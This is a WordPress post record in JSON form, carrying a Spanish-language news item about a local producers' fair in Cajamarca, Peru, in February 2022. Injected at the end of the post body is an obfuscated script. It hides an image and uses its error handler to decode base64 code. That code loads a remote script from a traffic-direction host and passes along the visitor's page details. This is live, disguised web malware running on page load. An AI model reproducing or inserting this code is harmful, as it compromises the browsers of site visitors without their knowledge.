{"id":5048,"date":"2022-02-18T17:22:07","date_gmt":"2022-02-18T20:22:07","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5048"},"modified":"2025-08-13T16:22:52","modified_gmt":"2025-08-13T19:22:52","slug":"feria-consume-lo-que-cajamarca-produce-vuelve-despues-de-dos-anos-como-parte-de-la-reactivacion-economica","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5048","title":{"rendered":"FERIA \u201cCONSUME LO QUE CAJAMARCA PRODUCE\u201d VUELVE DESPU\u00c9S DE DOS A\u00d1OS COMO PARTE DE LA REACTIVACI\u00d3N ECON\u00d3MICA"},"content":{"rendered":"\n<p>La feria \u201cConsume lo que Cajamarca produce\u201d vuelve despu\u00e9s de dos a\u00f1os por la pandemia del covid-19 y los emprendedores cajamarquinos ofertar\u00e1n sus productos a precios c\u00f3modos en el pasaje de la Cultura, en el centro hist\u00f3rico de la ciudad, del 18 al 20 de febrero.<\/p>\n<p>El gerente de Desarrollo Econ\u00f3mico de la Municipalidad provincial de Cajamarca, Shimi Torres Huacal, inform\u00f3 que, al menos 60 productores, empresarios y organizaciones que se dedican al rubro de la agroindustria, gastronom\u00eda y artesan\u00eda son las principales l\u00edneas de negocio\u2013 participar\u00e1n en el evento que promueve la reactivaci\u00f3n econ\u00f3mica.<\/p>\n<p><span>Antes de la pandemia del coronavirus, la feria se desarrollar\u00e1 en la explanada del complejo Qhapaq \u00d1an;\u00a0<\/span><span>sin embargo, en esta primera edici\u00f3n 2022, los organizadores han programado el evento en el centro hist\u00f3rico para facilitar el desplazamiento de los productores y p\u00fablico consumidor.<\/span><\/p>\n<p>Torres Huacal invit\u00f3 a la poblaci\u00f3n a asistir al pasaje de la Cultura este viernes, s\u00e1bado y domingo para adquirir productos de calidad a buen precio, de 10:00 a 20:00 horas, cumpliendo los protocolos de bioseguridad ante la pandemia del covid-19 .<\/p>\n<p><a href=\"https:\/\/click.mlsend2.com\/link\/c\/YT0xODg4NjYzOTMwNzc2MDY2NzM2JmM9ZjVsOSZlPTAmYj05MTQ1MjY4OTMmZD1tNGY0aDly.wZIbGhumaBHYtVlTTSJ3bieEVh9FOU84ilqB9niGAAk\"><img decoding=\"async\" class=\"alignleft wp-image-5049\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/02\/Captura-web_18-2-2022_171755_mail.google.com_-300x121.jpeg\" alt=\"\" width=\"141\" height=\"57\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/02\/Captura-web_18-2-2022_171755_mail.google.com_-300x121.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/02\/Captura-web_18-2-2022_171755_mail.google.com_.jpeg 507w\" sizes=\"(max-width: 141px) 100vw, 141px\" \/><\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La feria \u201cConsume lo que Cajamarca produce\u201d vuelve despu\u00e9s de dos a\u00f1os por la pandemia del covid-19 y los emprendedores cajamarquinos ofertar\u00e1n sus productos a precios c\u00f3modos en el pasaje de la Cultura, en el centro hist\u00f3rico de la ciudad, del 18 al 20 de febrero. El gerente de Desarrollo Econ\u00f3mico de la Municipalidad provincial [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5050,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31],"tags":[],"class_list":["post-5048","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboradores"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5048","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5048"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5048\/revisions"}],"predecessor-version":[{"id":10713,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5048\/revisions\/10713"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5050"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5048"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5048"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5048"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}